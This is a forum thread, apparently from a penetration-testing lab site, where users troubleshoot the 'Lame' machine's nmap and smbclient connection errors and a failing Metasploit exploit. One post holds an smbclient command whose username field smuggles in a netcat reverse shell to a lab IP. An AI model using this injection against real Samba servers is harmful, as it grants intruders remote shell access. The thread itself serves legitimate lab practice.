Issue with Lame?

This is my 3rd box, and I figured it would be an easy one, but I run into some issues.
First: running nmap -A -oA nmap 10.10.10.3 gives me “Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn”

Works fine with -Pn.

Next, I tried to connect with smbclient without succeeding:

smbclient //10.10.10.3/tmp
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

Is this normal behavior for this box? Thanks

Hmm so now I’m having a similar issue with Nibbles (the nmap issue). So I’m gonna try to restart my machine and vpn.

Edit: After rebooting my VM, I don’t need to use -Pn for Nibbles, but still have issues when running Lame. I’ll just stay on Nibbles for now.

Also having the same problem with Lame.
Anyone have any idea what the source of the problem could be?

Literally 2 mins after posting this I found the solution add the following line to the smb.conf file in the global section. - client max protocol = NT1

I believe to force smbclient to use smb v1

i am getting NT_STATUS_CONNECTION_DISCONNECTED error while connecting with smbclient

@b00l3an said:
Literally 2 mins after posting this I found the solution add the following line to the smb.conf file in the global section. - client max protocol = NT1

I believe to force smbclient to use smb v1

I was also having this problem. I tried adding

client max protocol = NT1
to the smb.conf file but ended up getting
protocol negotiation failed: NT_STATUS_INVALID_PARAMETER_MIX

I then added

client min protocol = NT1
after the client max protocol paramater and everything seemed to work.

The right command for me was: smbclient \\10.10.10.3\tmp to force Linux to recognize a backslash as a backslash character or use single quote.

The right command for me was: smbclient \\\\10.10.10.3\\tmp to force Linux to recognize a backslash as a backslash character or use single quote.

I meant that.

okay so I am having issues too.

this command made login successful:

smbclient -L //10.10.10.3/ --option=‘client min protocol=NT1’
Enter WORKGROUP\root’s password:
Anonymous login successful

BUT smbclient \\10.10.10.3\tmp (and other variations) keep hitting me with :
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

going off of another forum post’s comments i tried smbmap -R -H 10.10.10.3
which gave me
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
.\tmp*

but still can’t get into tmp.
dunno if i’m missing something or it’s going over my head bc of frustration.

root@learnskill.today:~/htb/lame# smbclient //10.10.10.3/tmp --option=‘client min protocol=NT1’ -U “./=nohup nc -e /bin/sh 10.10.14.2 443
nohup: ignoring input and redirecting stderr to stdout

Try editing the “smb” config file:
sudo vi /etc/samba/smb.conf

Add the following settings under “GLOBAL”:
client min protocol = CORE
client max protocol = SMB3

Save and exit the file:
Esc
:wq
Enter

So i am new to pen testing and was trying to nmap lame. nmap -sC -sV 10.10.10.3
It give 0 host up error every time.If i try to use metasploit by searching walkthrough it generates this error
10.10.10.3:139 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.

Type your comment> @AHKompany said:

So i am new to pen testing and was trying to nmap lame. nmap -sC -sV 10.10.10.3
It give 0 host up error every time.If i try to use metasploit by searching walkthrough it generates this error
10.10.10.3:139 - Exploit failed: An exploitation error occurred.
[*] Exploit completed, but no session was created.

I am also having this exact same issue and am pulling my hair out to try and determine the cause. I got to the point where I have read multiple walkthroughs all ending with the same exploit but for me the exploit fails big shrug

Was just trying out this machine. I was trying to focus on 139,445 and the services would report as open, but a couple minutes later they’d be filtered. I’ve never been able to the anon login because I keep getting connection errors.

Regarding metasploit, I ran into this problem just now on Lame as well and was able to figure it out. My guess is the actual exploit itself has changed since the walkthroughs were written, or else maybe my metasploit somehow was different.

Anyway, it appears the exploit did not have a payload specified, or else maybe had a generic payload specified. I did some Googling and found how to select and specify a payload using (withing metasploit) “show payloads”. This will list the payloads which are compatible with your selected exploit. Then I just tried a few until I found one which worked. Note that you may need to define certain additional options once you’ve selected a payload, such as LHOST and LPORT. Just type “options” after choosing your payload and it should show what you need to define.

Hope this helps.

Type your comment> @cow125 said:

@b00l3an said:
Literally 2 mins after posting this I found the solution add the following line to the smb.conf file in the global section. - client max protocol = NT1

I believe to force smbclient to use smb v1

I was also having this problem. I tried adding

client max protocol = NT1
to the smb.conf file but ended up getting
protocol negotiation failed: NT_STATUS_INVALID_PARAMETER_MIX

I then added

client min protocol = NT1
after the client max protocol paramater and everything seemed to work.

thanks mate, worked fine for me

Type your comment> @cow125 said:

@b00l3an said:
Literally 2 mins after posting this I found the solution add the following line to the smb.conf file in the global section. - client max protocol = NT1

I believe to force smbclient to use smb v1

I was also having this problem. I tried adding

client max protocol = NT1
to the smb.conf file but ended up getting
protocol negotiation failed: NT_STATUS_INVALID_PARAMETER_MIX

I then added

client min protocol = NT1
after the client max protocol paramater and everything seemed to work.

Thanks mate worked for me

please help me to solve this issue

$smbclient -N \\10.10.10.27\backup
tree connect failed: NT_STATUS_BAD_NETWORK_NAME

smbclient //IP/directory --option=‘client min protocol=NT1’